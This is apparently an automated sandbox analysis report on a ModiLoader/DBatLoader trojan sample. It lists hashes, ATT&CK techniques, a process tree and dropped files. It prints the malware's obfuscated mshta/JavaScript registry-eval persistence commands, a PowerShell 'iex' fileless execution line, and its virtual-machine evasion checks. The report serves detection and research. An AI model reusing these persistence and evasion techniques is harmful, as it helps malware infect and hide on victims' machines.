modiloader | 29ede81b60e5339d3df6b58fe4205a57c2c7862c1e2a6f8398676666edf1d470

General

Target

bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe
Size

794KB
MD5

bbbbf63caf6a880b5eda01e9e66aeef4
SHA1

ca702fbe0adbc8514a3ef277434e0636a6616490
SHA256

29ede81b60e5339d3df6b58fe4205a57c2c7862c1e2a6f8398676666edf1d470
SHA512

d0e34b4120417cafea7e5ef86facf050020d5052635e93dc226e853977f76a9e4040d36ce0c909214e0e95f5a2994c0c942b30a199ff11fd17ac60b6f7b52c96
SSDEEP

12288:1QHlW7lerECtu4aLgbqu6khVc0qI7oe3gPxWNpUcocscxFZwb:1QQperrOUj6k7ZqC30VFMlwb

Score

10^/10

modiloader evasion persistence trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2820 2792 mshta.exe
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
evasion

File and Directory Discovery
T1083

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	2792	mshta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

description	ioc	process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

ModiLoader Second Stage 58 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3024-21-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-30-0x0000000000400000-0x0000000000439000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-31-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-32-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-33-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-36-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-35-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-34-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-37-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-38-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-41-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2
behavioral1/memory/2524-45-0x0000000006290000-0x0000000006364000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-46-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-47-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2524-49-0x0000000006290000-0x0000000006364000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-69-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2524-48-0x0000000002E20000-0x0000000004E20000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-68-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-67-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-66-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-65-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-64-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-63-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-62-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-61-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-60-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-59-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-58-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-57-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-56-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-55-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-54-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-53-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-52-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-51-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-50-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-70-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-71-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-72-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-73-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-74-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-82-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-81-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-80-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-79-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/2244-89-0x0000000000270000-0x00000000003AE000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-90-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-93-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-91-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-92-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-94-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-100-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-99-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-98-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-97-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-96-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/1516-95-0x00000000000D0000-0x000000000020E000-memory.dmp	modiloader_stage2
behavioral1/memory/3024-127-0x0000000000440000-0x0000000000514000-memory.dmp	modiloader_stage2

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

regsvr32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Drops startup file 1 IoCs

Processes:

regsvr32.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0815f.lnk regsvr32.exe
Executes dropped EXE 1 IoCs

Processes:

UUPPHBZOfNIWNOEBZBhdR.exe

pid process

2032 UUPPHBZOfNIWNOEBZBhdR.exe
Loads dropped DLL 1 IoCs

Processes:

bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe

pid process

2988 bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0815f.lnk	regsvr32.exe

pid	process
2032	UUPPHBZOfNIWNOEBZBhdR.exe

pid	process
2988	bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

regsvr32.exebbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:vv6tP3abGu=\"5qZzf\";H5V9=new%20ActiveXObject(\"WScript.Shell\");syGZxi2H6=\"qJ3\";NE2QV=H5V9.RegRead(\"HKCU\\\\software\\\\qkrwuzl\\\\yjiro\");aLk4QS6Q=\"n\";eval(NE2QV);FGa4XWPf=\"mlXFLDf\";"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\c55956\\379df8.lnk\""	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:AnZdBwR6K=\"oqI\";xg1=new%20ActiveXObject(\"WScript.Shell\");imYBpz9=\"mZDecanM\";xvM9l=xg1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\qkrwuzl\\\\yjiro\");fnumGB8rQ=\"nus\";eval(xvM9l);bQ4bLk5u=\"wT\";"	regsvr32.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	regsvr32.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

UUPPHBZOfNIWNOEBZBhdR.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 2032 set thread context of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2524 set thread context of 2244	2524	powershell.exe	regsvr32.exe
PID 2244 set thread context of 1516	2244	regsvr32.exe	regsvr32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\International	regsvr32.exe

Modifies registry class 7 IoCs

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\dbb882\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\dbb882\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\dbb882\shell\open\command\ = "mshta \"javascript:QnVXyyi0S=\"2\";l50e=new ActiveXObject(\"WScript.Shell\");p9duIL9Zgp=\"FQO\";p55PZG=l50e.RegRead(\"HKCU\\\\software\\\\qkrwuzl\\\\yjiro\");tgBm9BD=\"ya8tNrJmT\";eval(p55PZG);xK6LGh1K=\"4K\";\""	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\.925876a	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\.925876a\ = "dbb882"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\dbb882	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\dbb882\shell	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeregsvr32.exe

pid	process
2524	powershell.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe
2244	regsvr32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exeregsvr32.exe

pid process

2524 powershell.exe
2244 regsvr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2524 powershell.exe

description	pid	process
Token: SeDebugPrivilege	2524	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exeUUPPHBZOfNIWNOEBZBhdR.exemshta.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 2988 wrote to memory of 2032	2988	bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2988 wrote to memory of 2032	2988	bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2988 wrote to memory of 2032	2988	bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2988 wrote to memory of 2032	2988	bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe	UUPPHBZOfNIWNOEBZBhdR.exe
PID 2032 wrote to memory of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2032 wrote to memory of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2032 wrote to memory of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2032 wrote to memory of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2032 wrote to memory of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2032 wrote to memory of 3024	2032	UUPPHBZOfNIWNOEBZBhdR.exe	wscript.exe
PID 2820 wrote to memory of 2524	2820	mshta.exe	powershell.exe
PID 2820 wrote to memory of 2524	2820	mshta.exe	powershell.exe
PID 2820 wrote to memory of 2524	2820	mshta.exe	powershell.exe
PID 2820 wrote to memory of 2524	2820	mshta.exe	powershell.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2524 wrote to memory of 2244	2524	powershell.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe
PID 2244 wrote to memory of 1516	2244	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bbbbf63caf6a880b5eda01e9e66aeef4_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2988

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe UUPPHBZOfNIWNOEBZBh
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\wscript.exe
- CmdLine Args
3⤵
PID:3024

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:caow3ZJ2l="F84";n96W=new%20ActiveXObject("WScript.Shell");RS4mtyyOS="RBL";ke0Yp3=n96W.RegRead("HKLM\\software\\Wow6432Node\\6N0laZkr5\\jfc13qAV");AWX9Z3loiu="IqvKm";eval(ke0Yp3);MJS85fSf="ZrHz6pZN";
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:zufuhmhx
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2524

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe
3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\SysWOW64\regsvr32.exe"
4⤵
PID:1516

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Virtualization/Sandbox Evasion

3

T1497

Modify Registry

2

T1112

Credential Access

Discovery

Software Discovery

1

T1518

Query Registry

4

T1012

Virtualization/Sandbox Evasion

3

T1497

File and Directory Discovery

1

T1083

System Information Discovery

3

T1082

Peripheral Device Discovery

1

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TcEMbLQgCOBP
Filesize
211KB

MD5
8fadfcb36f2fcb8cd5563aa718ff7958

SHA1
00ed85c2346231c8d9b146bf77abe37712f298a5

SHA256
abc35989ce7d5dddcaba45ee4fabf1d7029b6afc5ab11bfb6c69a8a5a9a79f91

SHA512
63b9bcd5361c13165104446d981022614c8f84345895937d0686d5b37407a105c196e2219a1f09feb552a778987ca6536e8914987073ba92b62364b62d4ce139

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh
Filesize
38KB

MD5
adbbe9634b5819cc48cb9700d0d21f7b

SHA1
4a2f11f35db9fd8a3dfff28c9bfcd1463a8aeb2e

SHA256
af423bd619a7ddf795f53194985596794c30279a56221dd30b67c3a7ba19a865

SHA512
60d80abf67cedbd2d86459461b90eba039ec14b6f002daf44468ce621960d5fc745ccb6319f9c15fd0c29cfe6581ac2026d8747908005fbbf245d71144171d04

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe
Filesize
732KB

MD5
71d8f6d5dc35517275bc38ebcc815f9f

SHA1
cae4e8c730de5a01d30aabeb3e5cb2136090ed8d

SHA256
fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b

SHA512
4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

Download Submit
C:\Users\Admin\AppData\Local\c55956\379df8.lnk
Filesize
881B

MD5
a7d115859229d9c97076a009465b4d77

SHA1
d033ddb1e15f1a1e8482970b2b27aef34c2e98c8

SHA256
0c4db9b76c4ccc4db475875eff08c8d9475cdc9e2393aa191c94361dbbf281f4

SHA512
2c98d6ecbcef1112fdb1d8a3a9833d0ef6e2997562ec2b5c2694346b1e97cee329c783ad4140ae946b237f619cef808326c0df9307059eec101c045db72cd065

Download Submit
C:\Users\Admin\AppData\Local\c55956\4f746e.925876a
Filesize
14KB

MD5
c73f7e8f65234a93f028b080c579db13

SHA1
f3a9833b27929438adfbb20dfca2fde04b732481

SHA256
39dcc1f10dc2c14543ec87fa0656a9c8906b98fc8490fa77bce03e54b850deea

SHA512
60ff7d7bd8c12f331033628354cc57d5e32a5f1940eb039c2b57563a5a147faf00520faf24f5e169e8ac17b73546d3f193f9159009298e71992675d141221653

Download Submit
C:\Users\Admin\AppData\Local\c55956\ff1237.bat
Filesize
61B

MD5
a4ee564ba17858e285c3daf96c530e67

SHA1
c9d811ebf359babdd15ca5374ae6afb1b31401b8

SHA256
9134562b968a0afd491534e7074a3ba744c630d819c4f0c199dc79668ad12e1a

SHA512
74e316747b51b52cf8ccf57ed0f3c9a467c15d309d8de7fb905f918178d3b700d4a497e8cd9de355ee29a7a8faccec5bd3665896a96273176c0f07e343827124

Download Submit
C:\Users\Admin\AppData\Roaming\18be8e\b446ee.925876a
Filesize
14KB

MD5
7733e3d1b15bcbc1c1378de595a07727

SHA1
84b96002ed64f6778a29408a177f0d08c9ccf147

SHA256
34276bd88e34400f01b8da49e2e75b9c19218ec89c714b0e016cf56d9409eba6

SHA512
8ee6bcbaadca6e0744b664299bab9cc668b85083dfbbcd3396d449e0065386e00123a77b0ec2a12424dbae77303ec1eb0b6f030d599104eaab6f33963f853142

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0815f.lnk
Filesize
991B

MD5
5592dc4872c01117fd612f02d11891c9

SHA1
3e105217b580e17e8a80bf1321426c5445f169f7

SHA256
704c3dc7e513179ddf114a29401f05220871168263c3aaf0482743fc2489c89b

SHA512
0c8757eff96fad7ea7361750e0f8c01013d3427700a6726cc4f9fb1edb094827a22c97bdf4bdff33a0c080b6e1cada70bf7057d5b640a7a731ecd8bcad32a23e

Download Submit
memory/1516-96-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-95-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-97-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-98-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-99-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-100-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-94-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-92-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-91-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-93-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/1516-90-0x00000000000D0000-0x000000000020E000-memory.dmp

Filesize
1.2MB

Download
memory/2032-19-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/2244-79-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-73-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-46-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-68-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-67-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-66-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-65-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-64-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-63-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-62-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-61-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-60-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-59-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-58-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-57-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-56-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-55-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-54-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-53-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-52-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-51-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-50-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-70-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-71-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-72-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-69-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
1.2MB

Download
memory/2244-74-0x0000000000270000-0x00000000003AE000-memory.dmp

Filesize
